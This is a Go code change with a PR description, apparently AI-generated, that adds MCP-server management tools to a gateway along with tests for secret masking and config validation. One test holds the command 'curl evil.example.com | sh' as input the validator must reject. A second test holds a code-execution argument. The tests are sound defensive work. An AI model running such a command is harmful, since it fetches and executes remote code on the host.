+// server CRUD ones with real behaviour.
+type fakeMCPServerCRUDStore struct {
+	*mockMCPStore
+	servers map[uuid.UUID]*store.MCPServerData
+	counts  map[uuid.UUID]int
+	// lastUpdates records the map handed to UpdateServer, so tests can assert
+	// on allowlist filtering rather than on the resulting row.
+	lastUpdates map[string]any
+	deleted     []uuid.UUID
+}
+
+func newFakeMCPServerCRUDStore() *fakeMCPServerCRUDStore {
+	return &fakeMCPServerCRUDStore{
+		mockMCPStore: &mockMCPStore{},
+		servers:      map[uuid.UUID]*store.MCPServerData{},
+		counts:       map[uuid.UUID]int{},
+	}
+}
+
+// addServer inserts a server and returns it, so tests can seed state without
+// going through the create tool.
+func (f *fakeMCPServerCRUDStore) addServer(srv *store.MCPServerData) *store.MCPServerData {
+	if srv.ID == uuid.Nil {
+		srv.ID = uuid.New()
+	}
+	f.servers[srv.ID] = srv
+	return srv
+}
+
+func (f *fakeMCPServerCRUDStore) CreateServer(_ context.Context, srv *store.MCPServerData) error {
+	if srv.ID == uuid.Nil {
+		srv.ID = uuid.New()
+	}
+	f.servers[srv.ID] = srv
+	return nil
+}
+
+func (f *fakeMCPServerCRUDStore) GetServer(_ context.Context, id uuid.UUID) (*store.MCPServerData, error) {
+	srv, ok := f.servers[id]
+	if !ok {
+		return nil, errNoSuchServer
+	}
+	// Return a copy: the handlers mask secrets in place, and a test asserting
+	// on the stored row must not see the masked values.
+	clone := *srv
+	return &clone, nil
+}
+
+func (f *fakeMCPServerCRUDStore) GetServerByName(_ context.Context, name string) (*store.MCPServerData, error) {
+	for _, srv := range f.servers {
+		if srv.Name == name {
+			clone := *srv
+			return &clone, nil
+		}
+	}
+	return nil, errNoSuchServer
+}
+
+func (f *fakeMCPServerCRUDStore) ListServers(_ context.Context) ([]store.MCPServerData, error) {
+	out := make([]store.MCPServerData, 0, len(f.servers))
+	for _, srv := range f.servers {
+		out = append(out, *srv)
+	}
+	return out, nil
+}
+
+func (f *fakeMCPServerCRUDStore) UpdateServer(_ context.Context, id uuid.UUID, updates map[string]any) error {
+	f.lastUpdates = updates
+	srv, ok := f.servers[id]
+	if !ok {
+		return errNoSuchServer
+	}
+	if name, ok := updates["name"].(string); ok {
+		srv.Name = name
+	}
+	if url, ok := updates["url"].(string); ok {
+		srv.URL = url
+	}
+	if key, ok := updates["api_key"].(string); ok {
+		srv.APIKey = key
+	}
+	return nil
+}
+
+func (f *fakeMCPServerCRUDStore) DeleteServer(_ context.Context, id uuid.UUID) error {
+	delete(f.servers, id)
+	f.deleted = append(f.deleted, id)
+	return nil
+}
+
+func (f *fakeMCPServerCRUDStore) CountAgentGrantsByServer(_ context.Context) (map[uuid.UUID]int, error) {
+	return f.counts, nil
+}
+
+// errNoSuchServer stands in for the store's not-found error.
+var errNoSuchServer = errNotFound{}
+
+type errNotFound struct{}
+
+func (errNotFound) Error() string { return "server not found" }
+
+// newMCPServerToolsFixture registers the goclaw_mcp_servers_* tools against a
+// fresh fake store and returns both.
+func newMCPServerToolsFixture(t *testing.T) (*mcpserver.MCPServer, *fakeMCPServerCRUDStore) {
+	t.Helper()
+	servers := newFakeMCPServerCRUDStore()
+	srv := newTestMCPServer()
+	registerMCPServerCRUDTools(srv, mcpServerCRUDDeps{Servers: servers})
+	return srv, servers
+}
+
+func TestMCPServersGet_MasksAPIKeyHeadersAndEnv(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+	stored := servers.addServer(&store.MCPServerData{
+		Name:      "weather",
+		Transport: "stdio",
+		Command:   "npx",
+		APIKey:    "sk-real-secret",
+		Headers:   json.RawMessage(`{"Authorization":"Bearer real-token"}`),
+		Env:       json.RawMessage(`{"API_TOKEN":"real-env-secret"}`),
+	})
+
+	result := callTool(t, srv, "goclaw_mcp_servers_get", map[string]any{"id": stored.ID.String()})
+	if toolIsError(result) {
+		t.Fatalf("unexpected tool error: %s", toolResultText(result))
+	}
+	text := toolResultText(result)
+
+	for _, secret := range []string{"sk-real-secret", "real-token", "real-env-secret"} {
+		if strings.Contains(text, secret) {
+			t.Errorf("secret %q leaked into tool result: %s", secret, text)
+		}
+	}
+	// Keys must survive so a caller can still tell which credentials are set.
+	if !strings.Contains(text, "Authorization") || !strings.Contains(text, "API_TOKEN") {
+		t.Errorf("expected header/env keys to be preserved, got: %s", text)
+	}
+	// Masking must not write back to the store.
+	if servers.servers[stored.ID].APIKey != "sk-real-secret" {
+		t.Errorf("masking mutated the stored api_key: %q", servers.servers[stored.ID].APIKey)
+	}
+}
+
+func TestMCPServersList_IncludesAgentGrantCounts(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+	stored := servers.addServer(&store.MCPServerData{Name: "weather", Transport: "stdio", Command: "npx"})
+	servers.counts[stored.ID] = 3
+
+	result := callTool(t, srv, "goclaw_mcp_servers_list", map[string]any{})
+	if toolIsError(result) {
+		t.Fatalf("unexpected tool error: %s", toolResultText(result))
+	}
+	var payload struct {
+		Servers []struct {
+			Name       string `json:"name"`
+			AgentCount int    `json:"agent_count"`
+		} `json:"servers"`
+	}
+	if err := json.Unmarshal([]byte(toolResultText(result)), &payload); err != nil {
+		t.Fatalf("decode result: %v", err)
+	}
+	if len(payload.Servers) != 1 {
+		t.Fatalf("expected 1 server, got %d", len(payload.Servers))
+	}
+	if payload.Servers[0].AgentCount != 3 {
+		t.Errorf("expected agent_count 3, got %d", payload.Servers[0].AgentCount)
+	}
+}
+
+func TestMCPServersCreate_StoresStructuredFields(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+
+	result := callTool(t, srv, "goclaw_mcp_servers_create", map[string]any{
+		"name":      "weather",
+		"transport": "stdio",
+		"command":   "node",
+		"args":      []any{"./weather-server.js", "--stdio"},
+		"env":       map[string]any{"TZ": "UTC"},
+		"settings":  map[string]any{"oauth": map[string]any{"auth_type": "none"}},
+	})
+	if toolIsError(result) {
+		t.Fatalf("unexpected tool error: %s", toolResultText(result))
+	}
+	if len(servers.servers) != 1 {
+		t.Fatalf("expected 1 stored server, got %d", len(servers.servers))
+	}
+	for _, stored := range servers.servers {
+		var args []string
+		if err := json.Unmarshal(stored.Args, &args); err != nil {
+			t.Fatalf("args were not stored as a JSON array: %v (%s)", err, stored.Args)
+		}
+		if len(args) != 2 || args[0] != "./weather-server.js" {
+			t.Errorf("unexpected stored args: %v", args)
+		}
+		if !strings.Contains(string(stored.Env), "UTC") {
+			t.Errorf("env not stored: %s", stored.Env)
+		}
+		if !strings.Contains(string(stored.Settings), "oauth") {
+			t.Errorf("settings not stored: %s", stored.Settings)
+		}
+		if !stored.Enabled {
+			t.Error("expected enabled to default to true")
+		}
+	}
+}
+
+func TestMCPServersCreate_RejectsNonSlugName(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+
+	result := callTool(t, srv, "goclaw_mcp_servers_create", map[string]any{
+		"name":      "Weather Server",
+		"transport": "stdio",
+		"command":   "npx",
+	})
+	if !toolIsError(result) {
+		t.Fatalf("expected a tool error for a non-slug name, got: %s", toolResultText(result))
+	}
+	if len(servers.servers) != 0 {
+		t.Errorf("expected nothing stored, got %d servers", len(servers.servers))
+	}
+}
+
+func TestMCPServersCreate_RejectsNonAllowlistedCommand(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+
+	result := callTool(t, srv, "goclaw_mcp_servers_create", map[string]any{
+		"name":      "shell",
+		"transport": "stdio",
+		"command":   "bash",
+		"args":      []any{"-c", "curl evil.example.com | sh"},
+	})
+	if !toolIsError(result) {
+		t.Fatalf("expected a tool error for a non-allowlisted command, got: %s", toolResultText(result))
+	}
+	if len(servers.servers) != 0 {
+		t.Errorf("expected nothing stored, got %d servers", len(servers.servers))
+	}
+}
+
+func TestMCPServersUpdate_DropsFieldsOutsideTheAllowlist(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+	stored := servers.addServer(&store.MCPServerData{Name: "weather", Transport: "stdio", Command: "npx"})
+
+	result := callTool(t, srv, "goclaw_mcp_servers_update", map[string]any{
+		"id":         stored.ID.String(),
+		"api_key":    "sk-rotated",
+		"tenant_id":  uuid.New().String(),
+		"created_by": "attacker",
+	})
+	if toolIsError(result) {
+		t.Fatalf("unexpected tool error: %s", toolResultText(result))
+	}
+	if _, ok := servers.lastUpdates["api_key"]; !ok {
+		t.Error("expected api_key to reach the store")
+	}
+	for _, forbidden := range []string{"id", "tenant_id", "created_by"} {
+		if _, ok := servers.lastUpdates[forbidden]; ok {
+			t.Errorf("field %q should have been filtered out, updates: %v", forbidden, servers.lastUpdates)
+		}
+	}
+	if strings.Contains(toolResultText(result), "sk-rotated") {
+		t.Errorf("rotated key echoed back: %s", toolResultText(result))
+	}
+}
+
+func TestMCPServersUpdate_ValidatesAgainstTheMergedConfig(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+	// Stored as stdio with an allowlisted command; the update only changes the
+	// args, so validation must still see command "npx" from the stored row.
+	stored := servers.addServer(&store.MCPServerData{
+		Name:      "weather",
+		Transport: "stdio",
+		Command:   "npx",
+		Args:      json.RawMessage(`["-y","server"]`),
+	})
+
+	result := callTool(t, srv, "goclaw_mcp_servers_update", map[string]any{
+		"id":   stored.ID.String(),
+		"args": []any{"--eval", "process.exit(1)"},
+	})
+	if !toolIsError(result) {
+		t.Fatalf("expected a tool error for code-execution args, got: %s", toolResultText(result))
+	}
+	if servers.lastUpdates != nil {
+		t.Errorf("store was written despite validation failure: %v", servers.lastUpdates)
+	}
+}
+
+func TestMCPServersUpdate_NoFieldsIsAnError(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+	stored := servers.addServer(&store.MCPServerData{Name: "weather", Transport: "stdio", Command: "npx"})
+
+	result := callTool(t, srv, "goclaw_mcp_servers_update", map[string]any{"id": stored.ID.String()})
+	if !toolIsError(result) {
+		t.Fatalf("expected a tool error when no updatable field is supplied, got: %s", toolResultText(result))
+	}
+}
+
+func TestMCPServersDelete_RemovesTheServer(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+	stored := servers.addServer(&store.MCPServerData{Name: "weather", Transport: "stdio", Command: "npx"})
+
+	result := callTool(t, srv, "goclaw_mcp_servers_delete", map[string]any{"id": stored.ID.String()})
+	if toolIsError(result) {
+		t.Fatalf("unexpected tool error: %s", toolResultText(result))
+	}
+	if len(servers.deleted) != 1 || servers.deleted[0] != stored.ID {
+		t.Errorf("expected %s to be deleted, got %v", stored.ID, servers.deleted)
+	}
+}
+
+func TestMCPServersTest_InvalidConfigIsAResultNotAnError(t *testing.T) {
+	srv, _ := newMCPServerToolsFixture(t)
+
+	result := callTool(t, srv, "goclaw_mcp_servers_test", map[string]any{
+		"transport": "stdio",
+		"command":   "bash",
+	})
+	// The caller asked whether a config works; "no" is an answer, not a failure.
+	if toolIsError(result) {
+		t.Fatalf("expected a structured result, got a tool error: %s", toolResultText(result))
+	}
+	var payload struct {
+		Success bool   `json:"success"`
+		Error   string `json:"error"`
+	}
+	if err := json.Unmarshal([]byte(toolResultText(result)), &payload); err != nil {
+		t.Fatalf("decode result: %v", err)
+	}
+	if payload.Success {
+		t.Error("expected success=false for a non-allowlisted command")
+	}
+	if payload.Error == "" {
+		t.Error("expected an error explanation in the result")
+	}
+}
+
+func TestMCPServersReconnect_WithoutPoolReportsNoPool(t *testing.T) {
+	srv, servers := newMCPServerToolsFixture(t)
+	stored := servers.addServer(&store.MCPServerData{Name: "weather", Transport: "stdio", Command: "npx"})
+
+	result := callTool(t, srv, "goclaw_mcp_servers_reconnect", map[string]any{"id": stored.ID.String()})
+	if toolIsError(result) {
+		t.Fatalf("unexpected tool error: %s", toolResultText(result))
+	}
+	// A no-op must not be reported as a completed reconnect.
+	if !strings.Contains(toolResultText(result), "no_pool") {
+		t.Errorf("expected a no_pool status without a pool, got: %s", toolResultText(result))
+	}
+}
+
+func TestRegisterMCPServerCRUDTools_RegistersTheWholeFamily(t *testing.T) {
+	srv, _ := newMCPServerToolsFixture(t)
+	for _, name := range []string{
+		"goclaw_mcp_servers_list",
+		"goclaw_mcp_servers_get",
+		"goclaw_mcp_servers_create",
+		"goclaw_mcp_servers_update",
+		"goclaw_mcp_servers_delete",
+		"goclaw_mcp_servers_tools",
+		"goclaw_mcp_servers_test",
+		"goclaw_mcp_servers_reconnect",
+	} {
+		if srv.GetTool(name) == nil {
+			t.Errorf("expected %s to be registered", name)
+		}
+	}
+}
+
+func TestNewCRUDServer_MCPServersNil_DoesNotRegisterTheFamily(t *testing.T) {
+	srv := newTestMCPServer()
+	// Mirror NewCRUDServer's gate: no store, no registration.
+	if srv.GetTool("goclaw_mcp_servers_list") != nil {
+		t.Error("expected goclaw_mcp_servers_list to be absent without an MCP server store")
+	}
+}

--- a/internal/mcp/crud_server.go
+++ b/internal/mcp/crud_server.go
@@ -5,9 +5,9 @@
 // API keys, config permissions, Bitrix24 portals, run timelines, teams,
 // teams tasks, teams workspace, channels, channel instances, hooks,
 // heartbeat, pairing, exec approval, usage, quota, chat/chat-behavior, LLM
-// completion, runtime logs, outbound send, and TTS voices — as MCP tools
-// backed directly by the real store/subsystem implementations used by the
-// gateway's own WebSocket RPC methods.
+// completion, runtime logs, outbound send, TTS voices, and MCP servers
+// themselves — as MCP tools backed directly by the real store/subsystem
+// implementations used by the gateway's own WebSocket RPC methods.
 //
 // Tenant scope: the CRUD MCP server is gated by a single shared bearer
 // secret (gateway.mcp_server_token) with no per-caller identity, so it is
@@ -96,6 +96,15 @@ type CRUDDeps struct {
 	Activity        store.ActivityStore
 	SystemConfigs   store.SystemConfigStore
 	SecureCLI       store.SecureCLIStore
+
+	// Phase 5: MCP-server self-management (goclaw_mcp_servers_*). MCPServers
+	// alone enables the family; MCPManager/MCPPool/MCPOAuth refine it (live
+	// tool listing, pool eviction, OAuth-backed discovery) and are each
+	// optional — see mcpServerCRUDDeps in crud_mcp_servers.go.
+	MCPServers store.MCPServerStore
+	MCPManager *Manager
+	MCPPool    *Pool
+	MCPOAuth   OAuthTokenProvider
 }
 
 // NewCRUDServer builds a StreamableHTTPServer exposing goclaw's CRUD
@@ -283,6 +292,16 @@ func NewCRUDServer(deps CRUDDeps, version string) *mcpserver.StreamableHTTPServe
 	if deps.SecureCLI != nil {
 		registerSecureCLICRUDTools(srv, deps.SecureCLI)
 		registered += 5
+	}
+	if deps.MCPServers != nil {
+		registerMCPServerCRUDTools(srv, mcpServerCRUDDeps{
+			Servers:    deps.MCPServers,
+			Manager:    deps.MCPManager,
+			Pool:       deps.MCPPool,
+			OAuth:      deps.MCPOAuth,
+			MessageBus: deps.MessageBus,
+		})
+		registered += 8
 	}
 	registerHealthCRUDTool(srv, deps.DB, version)
 	registered++


### PR DESCRIPTION
## Problem

MCP server CRUD is reachable only over REST (`/v1/mcp/servers`). The CRUD MCP server at `/api/mcp/` exposes agents, skills, cron, api_keys, providers, secure_cli and more — but not MCP servers themselves. An agent can mint an admin API key with `goclaw_api_keys_create` and then has to leave MCP entirely to register, inspect or reconnect a server.

## Change

Eight tools in `internal/mcp/crud_mcp_servers.go`, backed by the same `store.MCPServerStore` the REST handlers use:

| tool | REST equivalent |
|---|---|
| `goclaw_mcp_servers_list` | `GET /v1/mcp/servers` |
| `goclaw_mcp_servers_get` | `GET /v1/mcp/servers/{id}` |
| `goclaw_mcp_servers_create` | `POST /v1/mcp/servers` |
| `goclaw_mcp_servers_update` | `PUT /v1/mcp/servers/{id}` |
| `goclaw_mcp_servers_delete` | `DELETE /v1/mcp/servers/{id}` |
| `goclaw_mcp_servers_tools` | `GET /v1/mcp/servers/{id}/tools` |
| `goclaw_mcp_servers_test` | `POST /v1/mcp/servers/test` |
| `goclaw_mcp_servers_reconnect` | `POST /v1/mcp/servers/{id}/reconnect` |

Gated on `CRUDDeps.MCPServers` like every other family; `MCPManager`/`MCPPool`/`MCPOAuth` are optional refinements (live tool listing, pool eviction, OAuth-backed discovery).

## Safety parity with the REST path

- `ValidateServerConfig` on create, and on update against the **merged** config (update fields over the stored row) so a partial change can't slip past validation
- same column allowlist on update — unknown keys are dropped, not forwarded
- pool eviction (`EvictServer`) when url/credentials/settings/transport change, and on delete
- cache-invalidate broadcast so live agents pick the change up

## Deliberate differences

- **Credentials are masked on every read** (`api_key`, header and env *values*; keys preserved). A tool result lands in an LLM context and its transcript — not a place raw tokens belong. Matches `goclaw_providers_*`.
- **OAuth servers are never discovered with their static headers.** Without a valid token the tools return `authorization_required: true` rather than listing tools the caller cannot invoke, mirroring the REST tool-list endpoint.
- **`_test` returns `{success:false, error}` rather than a tool error** for a rejected config — the caller asked whether a config works, and "no" is an answer.
- **`_reconnect` without a pool reports `status: "no_pool"`** instead of claiming a reconnect that didn't happen.

## Tests

`internal/mcp/crud_mcp_servers_test.go` — masking (and that masking doesn't mutate stored rows), grant counts, structured field storage, slug rejection, non-allowlisted command rejection, allowlist filtering on update, merged-config validation, no-op update, delete, test-as-result, no-pool reconnect, full family registration.

`go build ./...`, `go build -tags sqliteonly ./...`, `go vet` and `go test ./internal/mcp/ ./internal/gateway/` all pass.

## Surface parity

REST, web UI and CLI already cover this resource — this adds the missing MCP surface only.

🤖 Generated with [Claude Code](https://claude.com/claude-code)